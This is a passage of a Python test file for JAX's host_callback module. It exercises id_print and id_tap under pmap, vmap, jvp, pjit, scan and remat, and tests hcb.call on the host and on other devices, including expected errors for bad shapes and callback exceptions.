jax.pmap(jax.vmap(partial(fun1, do_print=False))),
devices=local_devices())(
matrix)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[200.00 202.00 204.00]""")
@ignore_jit_of_pmap_warning()
def test_tap_pmap_pmap_extra(self):
"""pmap of a pmap surrounded by extra code."""
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
if nr_devices != 2:
raise SkipTest("test works only on 2 devices")
shape = (2, 1, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# This will be printed on all devices, with shape [1, 3]
xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
res = jax.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
# This will be printed on all devices, with shape [1, 3]
return maybe_print(do_print, res + 1., "after", tap_with_device=True)
res = jax.pmap(partial(fun, do_print=True))(matrix)
self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]
device: cpu:1 what: before
[[101.00 102.00 103.00]]
device: cpu:1 what: inside
[202.00 204.00 206.00]
device: cpu:1 what: after
[[203.00 205.00 207.00]]""")
def test_tap_jvp_pmap_vmap(self):
# A matrix M[ijk] = i * 100 + j * 10 * k
nr_devices = len(local_devices())
shape = (nr_devices, 2, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# x: f32[3]
return jax.jvp(jax.pmap(jax.vmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True))),
(xv,), (.1 * jnp.ones_like(xv),))
res = fun(matrix, do_print=True)
hcb.barrier_wait()
expected_res = fun(matrix, do_print=False)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
# Device 0 will get to execute jax.jvp(jax.vmap(...)) for matrix[0, :, :]
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[ 0.00 2.00 4.00]
[20.00 22.00 24.00]] [[0.20 0.20 0.20]
[0.20 0.20 0.20]] )
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[200.00 202.00 204.00]
[220.00 222.00 224.00]] [[0.20 0.20 0.20]
[0.20 0.20 0.20]] )""")
def test_tap_vmap_pmap(self):
# A matrix M[ijk] = i * 100 + j * 10 * k
nr_devices = len(local_devices())
shape = (2, nr_devices, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# x: f32[3]
return jax.vmap(jax.pmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)))(xv)
res = fun(matrix, do_print=True)
hcb.barrier_wait()
expected_res = fun(matrix, do_print=False)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
# Device 0 will get to execute jax.jvp(jax.vmap(...)) for matrix[:, 0, :]
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 0.00 2.00 4.00]
[200.00 202.00 204.00]]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 20.00 22.00 24.00]
[220.00 222.00 224.00]]""")
@ignore_jit_of_pmap_warning()
def test_tap_jit_pmap_extra(self):
"""jit of a pmap surrounded by extra code."""
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
assert nr_devices in (1, 2)
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# This will be printed on all devices with shape (nr_devices, 3)
xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
res = jax.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
# This will be printed on all devices with shape (nr_devices, 3)
return maybe_print(do_print, res + 1., "after", tap_with_device=True)
res = jax.jit(partial(fun, do_print=True))(matrix)
self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
if len(local_devices()) == 2:
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]
device: cpu:1 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:1 what: inside
[22.00 24.00 26.00]
device: cpu:1 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]""")
else:
assert len(local_devices()) == 1
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]""")
def test_tap_cond_pmap(self):
raise SkipTest("cond of pmap does not work in JAX. Issue #5178.")
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.float32)
def fun1(x, do_print=False):
return maybe_print(do_print, x * 2., "x * 2")
def fun2(cond, xv, do_print=False):
return lax.cond(cond, jax.pmap(partial(fun1, do_print=do_print)),
lambda xv: xv, xv)
res = fun2(True, matrix)
self.assertAllClose(fun2(True, matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
TBD""", testing_stream.output)
@jtu.skip_on_devices("cpu", "gpu")
# TODO(necula): file XLA:GPU bug for the 'Sharding' CustomCall
def test_tap_pjit(self):
devices = np.array(local_devices())
nr_devices = len(devices)
if nr_devices < 2:
raise SkipTest("test requires at least 2 devices")
print(f"test_tap_pjit is running on devices {devices}.")
# x: i32[D, 3] = [[0, 1, 2], [10, 11, 12], ...]
# y: i32[3, 4]
x = jnp.arange(100, dtype=jnp.int32).reshape((10, 10))[:nr_devices, :3]
y = jnp.ones((3, 4), np.int32)
@partial(jax.named_call, name="fun1") # for xprof debugging
def fun1(x, do_print=False):
z = jnp.dot(x, y)
return maybe_print(do_print, z, "z", tap_with_device=True)
res0 = fun1(x, do_print=False)
pjit_fun1 = pjit.pjit(
partial(fun1, do_print=True),
in_axis_resources=(P("d"),),
out_axis_resources=P("d"))
with maps.mesh(devices, ["d"]):
# Print the internal IR
helper_log_ir(
f"{self._testMethodName}.pjit",
pjit_fun1,
x,
num_partitions=nr_devices)
res = pjit_fun1(x)
self.assertAllClose(res0, res)
hcb.barrier_wait("before check")
# Assertion text is for 2 devices (also works for 1 device)
# Note that a single call is made.
assertMultiDeviceOutputEqual(
self, """
device: cpu:0 what: z
[[ 3 3 3 3]
[33 33 33 33]]""")
def test_tap_tap_scan_custom_jvp(self):
"""custom JVP, inside scan.
This exercises the custom_jvp_call_jaxpr primitives."""
@jax.custom_jvp
def f(x):
return x * hcb.id_print(x, output_stream=testing_stream, what="x")
@f.defjvp
def f_jvp(primals, tangents):
x, = primals
x_dot, = tangents
primal_out = f(x)
tangent_out = 3. * x * hcb.id_print(x_dot, output_stream=testing_stream, what="x_dot")
return primal_out, tangent_out
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertAllClose(0.7 * 0.7 * 2, g(arg))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
testing_stream.reset()
self.assertAllClose(np.array([2.1, 2.1]), jax.grad(g)(arg), check_dtypes=False)
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
transforms: ['transpose'] what: x_dot
2.1
transforms: ['transpose'] what: x_dot
2.1""", testing_stream.output)
def test_tap_scan_custom_vjp(self):
"""custom VJP, inside scan.
This exercises the custom_vjp_call_jaxpr primitives."""
@jax.custom_vjp
def f(x):
return x * hcb.id_print(x, output_stream=testing_stream, what="x")
# f_fwd: a -> (b, residual)
def f_fwd(x):
return f(x), 3. * x
# f_bwd: (residual, CT b) -> [CT a]
def f_bwd(residual, ct_b):
return residual * hcb.id_print(ct_b, output_stream=testing_stream, what="ct_b"),
f.defvjp(f_fwd, f_bwd)
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertAllClose(0.7 * 0.7 * 2, g(arg))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
testing_stream.reset()
self.assertAllClose(np.array([2.1, 2.1]), jax.grad(g)(arg), check_dtypes=False)
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
what: ct_b
1.
what: ct_b
1.""", testing_stream.output)
def test_tap_mask(self):
@partial(jax.mask, in_shapes=['n'], out_shape='')
def padded_sum(x):
three_x = hcb.id_print((x, 2 * x), result=3 * x, what="x",
output_stream=testing_stream)
return jnp.sum(three_x)
x = np.arange(5.)
self.assertAllClose(9., padded_sum([x], dict(n=3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )""",
testing_stream.output)
testing_stream.reset()
# With VMAP
xv = np.arange(10.).reshape((2, 5)) # logical_shape = 5
self.assertAllClose(
np.array([9., 78.]),
# batch_size = 2, n=3 and 4 for the two elements
jax.vmap(padded_sum)([xv],
dict(n=np.array([3., 4.]))))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), ('batch', {'batch_dims': (0, 0, 0, 0)})] what: x
( ( [[0. 1. 2. 3. 4.]
[5. 6. 7. 8. 9.]]
[[ 0. 2. 4. 6. 8.]
[10. 12. 14. 16. 18.]] )
( ( [3. 4.] ) ( [3. 4.] ) ) )""", testing_stream.output)
testing_stream.reset()
# With JVP
self.assertAllClose((9., 0.9),
jax.jvp(lambda arg: padded_sum([arg], dict(n=3)),
(x,), (x * 0.1,)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), 'jvp'] what: x
( ( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )
( ( [0. 0.1 0.2 0.3 0.4] [0. 0.2 0.4 0.6 0.8] ) ( ( False ) ( False ) ) ) )""",
testing_stream.output)
testing_stream.reset()
# Now with JIT
self.assertAllClose(9., jax.jit(padded_sum)([x], dict(n=3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.] [0. 2. 4. 6. 8.] ) ( ( 3 ) ( 3 ) ) )""",
testing_stream.output)
def test_tap_callback_delay(self):
hcb.callback_extra = lambda dev: time.sleep(1)
def func(x):
for i in range(5):
x = hcb.id_print(x * i, what="x times i")
return x
jax.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
def test_tap_callback_delay_barrier(self):
hcb.callback_extra = lambda dev: time.sleep(2)
def func(x):
for i in range(1, 4):
x = hcb.id_print(x * i, what=f"x times {i}", output_stream=testing_stream)
return x
jax.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
# Wait for the results
hcb.barrier_wait("first")
expected = """
what: x times 1
[[0. 1. 2.]
[3. 4. 5.]]
what: x times 2
[[ 0. 2. 4.]
[ 6. 8. 10.]]
what: x times 3
[[ 0. 6. 12.]
[18. 24. 30.]]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
# Call again
jax.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
hcb.barrier_wait("second")
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_error_bad_consumer_id(self):
"""Try to use reserved consumer ID 0.
Check that we get the proper error from the runtime."""
if not hcb._use_outfeed(jtu.device_under_test()):
raise SkipTest("test works only for outfeed")
comp = xla_bridge.make_computation_builder(self._testMethodName)
token = hcb.xops.CreateToken(comp)
hcb._initialize_outfeed_receiver() # Needed if this is the sole test
with self.assertRaisesRegex(RuntimeError,
"Consumer ID cannot be a reserved value: 0"):
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 0,
[xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.float32))])
def test_tap_error_different_shapes(self):
"""Try to register different shapes for the same consumer ID."""
if not hcb._use_outfeed(jtu.device_under_test()):
raise SkipTest("test works only for outfeed")
comp = xla_bridge.make_computation_builder(self._testMethodName)
token = hcb.xops.CreateToken(comp)
hcb._initialize_outfeed_receiver() # Needed if this is the sole test
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 123,
[xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.float32))])
with self.assertRaisesRegex(
RuntimeError, ".*does not match previous shape element_type.*"):
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 123,
[xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.int32))])
with self.assertRaisesRegex(
RuntimeError, ".*does not match previous shape element_type.*"):
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 123,
[xla_bridge.constant(comp, np.zeros((2,), dtype=np.float32))])
def test_tap_id_tap_removed_kwargs(self):
def func(x, transforms, y):
pass
with self.assertRaisesRegex(TypeError, r"Support for \*\*kwargs in ``id_tap``"):
hcb.id_tap(func, 1, y=2)
def test_tap_odeint(self):
# TODO: find a smaller repro for bug #4015
# Seems to be xla_call(scan(xla_call)), all under grad.
from jax.experimental.ode import odeint
def f(x, t, k):
x = hcb.id_print(x)
return -k * x
def loss(k=1.0):
t = jnp.linspace(0, 0.001, num=2)
xs = odeint(f, 1.0, t, k)
return xs[-1]
jax.grad(loss)(1.0) # should not fail
def test_tap_remat_0(self):
def f(i, k):
x = hcb.id_print(k + i, output_stream=testing_stream)
return k * x
def loss(k):
return lax.fori_loop(0, 2, jax.remat(f), k)
print(loss(3))
hcb.barrier_wait()
expected = """
3
10"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_use_remat={use_remat}_{grad_func}_use_result={use_result}",
use_result=use_result, use_remat=use_remat, grad_func=grad_func)
for use_result in [True, False]
for grad_func in ["grad", "value_and_grad"]
for use_remat in [True, False]))
def test_tap_remat(self, use_result=False, grad_func="grad", use_remat=False):
def f(x):
id_print_result = hcb.id_print(x, output_stream=testing_stream)
if use_result:
x = id_print_result
return 3. * x
grad_f = jax.grad if grad_func == "grad" else jax.value_and_grad
trans_f = jax.remat(f) if use_remat else f
print(jax.make_jaxpr(grad_f(trans_f))(2.))
grad_f(trans_f)(2.)
hcb.barrier_wait()
if not use_result:
if use_remat:
expected = ""
else:
# TODO: if not use_result then we should only see the primal when
# computing value_and_grad.
expected = "2."
elif use_remat:
expected = """
2.
2.
transforms: ['jvp', 'transpose']
3."""
else:
expected = """
2.
transforms: ['jvp', 'transpose']
3."""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
def test_tap_named_call(self):
def tap_scalar(init, do_print=False):
@partial(jax.named_call, name="step")
def step(acc, step_nr):
acc = acc + step_nr
maybe_print(do_print, step_nr, what="step_nr")
return acc, None
return lax.scan(step, init, np.arange(2))
self.assertAllClose(tap_scalar(3., do_print=False), tap_scalar(3., do_print=True))
hcb.barrier_wait()
expected = """
what: step_nr
0
what: step_nr
1"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
class HostCallbackCallTest(jtu.JaxTestCase):
"""Tests for hcb.call"""
def setUp(self):
super().setUp()
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
testing_stream.reset()
testing_stream._test_method_name = self._testMethodName
def tearDown(self) -> None:
hcb.barrier_wait("HostCallbackCallTest.tearDown")
super().tearDown()
def call_log_testing_stream(self, func, arg, *, result_shape, name=""):
"""Call `func` and log inputs and outputs to the testing stream"""
def call_log(arg):
def val2str(v):
return np.array2string(np.array(arg))
testing_stream.write(f"Call {name}({val2str(arg)})\n")
res = func(arg)
testing_stream.write(f" = {val2str(res)}\n")
return res
return hcb.call(call_log, arg, result_shape=result_shape)
def test_call_simple(self):
def f_outside(x):
return 2 * x
def fun(x):
y = hcb.call(f_outside, x + 1, result_shape=x)
return 3 * (1 + y)
arg = np.arange(24, dtype=np.int32).reshape((2, 3, 4))
self.assertAllClose(3 * (1 + 2 * (arg + 1)), fun(arg))
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_{np.dtype(dtype).name}", dtype=dtype)
for dtype in jtu.dtypes.all
if dtype != np.bool_))
def test_call_types(self, dtype=np.float64):
def f_outside(x):
# Use x + x to ensure that the result type is the same
return x + x
def fun(x):
return hcb.call(f_outside, x + x, result_shape=x)
arg = np.arange(24, dtype=dtype).reshape((2, 3, 4))
self.assertAllClose(arg + arg + arg + arg, fun(arg), check_dtypes=True)
def test_call_types_bool(self, dtype=np.float64):
def f_outside(x):
return np.invert(x)
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
arg = np.random.choice(a=[True, False], size=(2, 3, 4))
self.assertAllClose(np.invert(arg), fun(arg))
def test_call_tuples(self):
def f_outside(args):
x, y = args
return y, x # Swap the tuple
def fun(x):
xy = hcb.call(f_outside, (x, x + 1), result_shape=(x, x))
return 2 * xy[0] + 3 * xy[1]
arg = np.arange(24, dtype=np.int32).reshape((2, 3, 4))
self.assertAllClose(2 * (arg + 1) + 3 * arg, fun(arg))
def test_call_empty_arg(self):
"""Call with empty array."""
result = np.ones((2,), dtype=np.float32)
def f_outside(_):
return result
def fun(x):
return x + hcb.call(f_outside, (),
result_shape=jax.ShapeDtypeStruct(result.shape, result.dtype))
self.assertAllClose(2. + result, fun(2.))
def test_call_empty_result(self):
"""Call returning empty array."""
result_shape = (2, 0)
def f_outside(_):
return np.ones(result_shape, dtype=np.float32)
def fun(x):
return x + hcb.call(f_outside, 1.,
result_shape=jax.ShapeDtypeStruct(result_shape, np.float32))
self.assertAllClose(f_outside(0.), fun(2.))
def test_call_empty_result_inside_pytree(self):
"""Call returning a tuple with an empty array and a non-empty one."""
result_shape_0 = (2, 0)
result_shape_2 = (0,)
def f_outside(_):
return (np.ones(result_shape_0, dtype=np.float32),
np.ones((1,), dtype=np.float32),
np.ones(result_shape_2, dtype=np.float32))
def fun(x):
res = hcb.call(f_outside, 1.,
result_shape=(jax.ShapeDtypeStruct(result_shape_0, np.float32),
jax.ShapeDtypeStruct((1,), np.float32),
jax.ShapeDtypeStruct(result_shape_2, np.float32)))
self.assertEqual(result_shape_0, res[0].shape)
self.assertEqual(result_shape_2, res[2].shape)
return x + res[1]
self.assertAllClose(2 + np.ones((1,), dtype=np.float32), fun(2.))
def test_call_empty_result_all_pytree(self):
"""Call returning a tuple of empty arrays."""
result_shape = (2, 0)
def f_outside(_):
return (np.ones(result_shape, dtype=np.float32),
np.ones(result_shape, dtype=np.float32))
def fun(x):
res = hcb.call(f_outside, 1.,
result_shape=(jax.ShapeDtypeStruct(result_shape, np.float32),
jax.ShapeDtypeStruct(result_shape, np.float32)))
return x + res[0] + res[1]
self.assertAllClose(np.ones(result_shape, dtype=np.float32),
fun(2.))
def test_call_no_result(self):
def f_outside(arg):
self.call_log_testing_stream(lambda x: None, arg,
result_shape=None,
name="outside")
return arg
self.assertAllClose((3., 4.), f_outside((3., 4.)))
hcb.barrier_wait()
expected = """
Call outside([3. 4.])
= [3. 4.]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_call_cond(self):
def f_outside(args):
x, y = args
return x * y
def loop(x, use_outside=True):
def body(i, acc):
return lax.cond(i % 2 == 1,
lambda _: (hcb.call(f_outside, (acc, i),
result_shape=acc)
if use_outside else f_outside((acc, i))),
lambda _: acc,
None)
return lax.fori_loop(0, 18, body, x)
res_inside = loop(1.2, use_outside=False)
self.assertAllClose(res_inside, jax.jit(loop)(1.2))
def test_call_jit_scan_call(self):
def f_outside(x):
return x
def loop(x, use_outside=True):
def body(carry, i):
if use_outside:
return carry + hcb.call(f_outside, i,
result_shape=i), None
else:
return carry + i, None
return lax.scan(body, 0, x)
x = np.arange(5, dtype=np.int32)
res_outside = jax.jit(partial(loop, use_outside=True))(x)
self.assertAllClose(res_outside, loop(x, use_outside=False))
def test_call_doc_example1(self):
"""Examples from the documentation: simplest, call a function"""
def host_eig(x):
return np.linalg.eigvals(x)
shape = (2, 5, 4, 4)
m = np.ones(shape, dtype=np.float32)
def fun(m):
eig_m = hcb.call(host_eig, m,
result_shape=jax.ShapeDtypeStruct(m.shape[:-1], m.dtype))
return eig_m
expected_res = np.linalg.eigvals(m)
self.assertAllClose(expected_res, fun(m))
def test_call_doc_example_hlo(self):
"""Examples from the documentation: simplest, call a function."""
def fun1(m):
return jnp.sin(hcb.call(lambda x: np.cos,
jnp.cos(m),
result_shape=m))
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun1, m)
def fun2(m):
x = hcb.call(lambda x: None, 2, result_shape=())
return x
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun2, m)
def test_call_with_device(self):
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x
def func(x):
return hcb.call(callback_func, x,
result_shape=x,
call_with_device=True)
self.assertEqual(3., func(3.))
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 3.00""")
def test_call_pmap(self):
# Works for 1 or 2 devices
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x * np.array(3, np.int32)
def fun(x): # x: i32
return hcb.call(callback_func, x * 2,
result_shape=x,
call_with_device=True)
xv = jnp.arange(len(local_devices()), dtype=jnp.int32)
res = jax.pmap(fun)(xv)
self.assertAllClose(jax.pmap(lambda x: x * 6)(xv), res)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 0
device: cpu:1
Called with 2""")
def test_call_vmap(self):
def f_outside(x): return x
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
with self.assertRaisesRegex(NotImplementedError,
"batching rules are implemented only for id_tap, not for call"):
jax.vmap(fun)(np.ones((2, 3)))
@jtu.skip_on_devices("cpu", "gpu")
# TODO(necula): file XLA:GPU bug for the 'Sharding' CustomCall
def test_call_pjit(self):
devices = np.array(local_devices())
nr_devices = len(devices)
if nr_devices < 2:
raise SkipTest("test requires at least 2 devices")
print(f"test_call_pjit is running on devices {devices}.")
# x: i32[D, 3] = [[0, 1, 2], [10, 11, 12], ...]
# y: i32[3, 4]
x = jnp.arange(100, dtype=jnp.int32).reshape((10, 10))[:nr_devices, :3]
y = jnp.ones((3, 4), np.int32)
def callback_x5_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x * np.array(5, np.int32)
def fun(x):
xy = jnp.dot(x, y)
return hcb.call(
callback_x5_func, xy, result_shape=xy, call_with_device=True)
pjit_fun = pjit.pjit(
fun, in_axis_resources=(P("d"),), out_axis_resources=P("d"))
with maps.mesh(devices, ["d"]):
# Print the internal IR
helper_log_ir(
f"{self._testMethodName}.pjit",
pjit_fun,
x,
num_partitions=nr_devices)
res = pjit_fun(x)
expected_res = jnp.dot(x, y) * np.array(5, np.int32)
self.assertAllClose(expected_res, res, check_dtypes=False)
hcb.barrier_wait("before assertion")
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(
self, """
device: cpu:0
Called with [[ 3 3 3 3]
[33 33 33 33]]""")
def test_call_error_bad_result_shape(self):
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape="string")
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape=lambda x: x)
hcb.barrier_wait("wait for error")
def helper_check_callback_errors(self, thunk: Callable,
expected_exc_txt: str):
"""Calls thunk() and checks for expected exceptions.
"""
if jtu.device_under_test() == "cpu":
# On CPU the runtime crashes, and the tests are all aborted
raise SkipTest("TODO: CPU runtime crashes on unexpected infeed")
elif jtu.device_under_test() == "gpu":
# On GPU we get a nice error back to Python
with self.assertRaisesRegex(
RuntimeError,
"RET_CHECK failure .* Mismatch between infeed source buffer shape s8.12345."):
thunk()
elif jtu.device_under_test() == "tpu":
# On TPU we get no error!!!
raise SkipTest("TODO: TPU runtime does not check infeed, and just computes with garbage")
# Both on GPU and TPU we also get an error during the barrier_wait at the
# end of the test. Run a barrier_wait now, to consume that error.
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile(
"There were exceptions during callback processing.*Last one was:.*" +
expected_exc_txt,
re.DOTALL)):
hcb.barrier_wait("Waiting for error")
def test_call_error_callback_throws_exception(self):
def f_outside(x):
raise ValueError("user exception")
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
self.helper_check_callback_errors(lambda: fun(3.),
"ValueError: user exception")
def test_call_error_callback_returns_unexpected_shape(self):
def fun(x):
return hcb.call(lambda x: (x, x), x, result_shape=x)
self.helper_check_callback_errors(lambda: fun(3.),
"Callback func .* should have returned a result with pytree")
def test_call_error_then_compute(self):
# Continue computation on device after error
def f_outside(x):
raise ValueError("user exception")
def fun(x):
x1 = hcb.call(f_outside, x, result_shape=x)
return x1
arg = np.arange(3, dtype=np.int32)
self.helper_check_callback_errors(lambda: self.assertAllClose(arg, fun(arg)),
"ValueError: user exception")
def call_jax_other_device(jax_outside_fun, arg, *, device):
"""Calls a JAX function on a specific device with simple support for reverse AD.
Functions whose name starts with "jax_outside" are called on another device,
by way of hcb.call.
"""
def run_jax_outside_fun(arg):
return jax.jit(jax_outside_fun)(jax.device_put(arg, device))
@jax.custom_vjp
def make_call(arg):
return hcb.call(run_jax_outside_fun, arg,
result_shape=jax.eval_shape(jax_outside_fun, arg))
# Define the fwd and bwd custom_vjp functions
def make_call_vjp_fwd(arg):
# Return the primal argument as the residual. Use `make_call` for the
# primal computation to enable higher-order AD.
return make_call(arg), arg # Return the primal argument as the residual
def make_call_vjp_bwd(res, ct_res):
arg = res # residual is the primal argument
def jax_outside_vjp_fun(arg_and_ct):
arg, ct = arg_and_ct
_, f_vjp = jax.vjp(jax_outside_fun, arg)
ct_in, = f_vjp(ct)
return ct_in
return (call_jax_other_device(jax_outside_vjp_fun, (arg, ct_res), device=device),)
make_call.defvjp(make_call_vjp_fwd, make_call_vjp_bwd)
return make_call(arg)
class CallJaxTest(jtu.JaxTestCase):
"""Tests using `call_jax_other_device`."""
def setUp(self):
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
if jtu.device_under_test() != "cpu":
assert jax.devices("cpu")
self.outside_device = jax.devices("cpu")[0]
else:
if len(jax.devices("cpu")) == 1:
raise SkipTest("Test needs at least two devices. On CPU use XLA_FLAGS=--xla_force_host_platform_device_count=2")
self.outside_device = jax.devices("cpu")[1]
super().setUp()
def test_jax_impl(self):
def f_jax(x):
return jnp.sin(x)
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
self.assertAllClose(f_jax(3.), f_outside(3.))
self.assertAllClose(f_jax(3.), jax.jit(f_outside)(3.))
def test_jax_impl_pytree(self):
def f_jax(x):
# x : dict(a=..., b=...) and output is a list of two elements
return [jnp.sin(x["a"]), jnp.sin(x["b"])]
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
x = dict(a=3., b=4.)
res_jax = f_jax(x)
# print(f"outside_jaxpr = {jax.make_jaxpr(f_outside)(x)}")
res_outside = f_outside(x)
self.assertAllClose(res_jax, res_outside)
def test_jax_grad(self):
def f_jax(x):
return 2. * jnp.sin(x)
def f_outside(x):
return 2. * call_jax_other_device(jnp.sin, x, device=self.outside_device)
res_jax = jax.grad(f_jax)(3.)
self.assertAllClose(res_jax, jax.grad(f_outside)(3.))
def test_jax_grad_pytree(self):
def f_jax(x):
# x : dict(a=..., b=...) and output is a float
return 3. * jnp.sin(x["a"]) + jnp.sin(x["b"])
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
x = dict(a=3., b=4.)
res_jax = jax.grad(f_jax)(x)
self.assertAllClose(res_jax, jax.grad(f_outside)(x))
def test_jax_grad_of_grad(self):
def f_jax(x):
return 2. * x * x * x
def f_outside(x):
return 2. * call_jax_other_device(lambda x: x * x * x, x, device=self.outside_device)
res_jax = jax.grad(jax.grad(f_jax))(5.)
res_outside = jax.grad(jax.grad(f_outside))(5.)
self.assertAllClose(res_jax, res_outside)
class OutfeedRewriterTest(jtu.JaxTestCase):
def setUp(self):
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
super().setUp()
def assertRewrite(self, expected: str, func: Callable, args: Sequence,
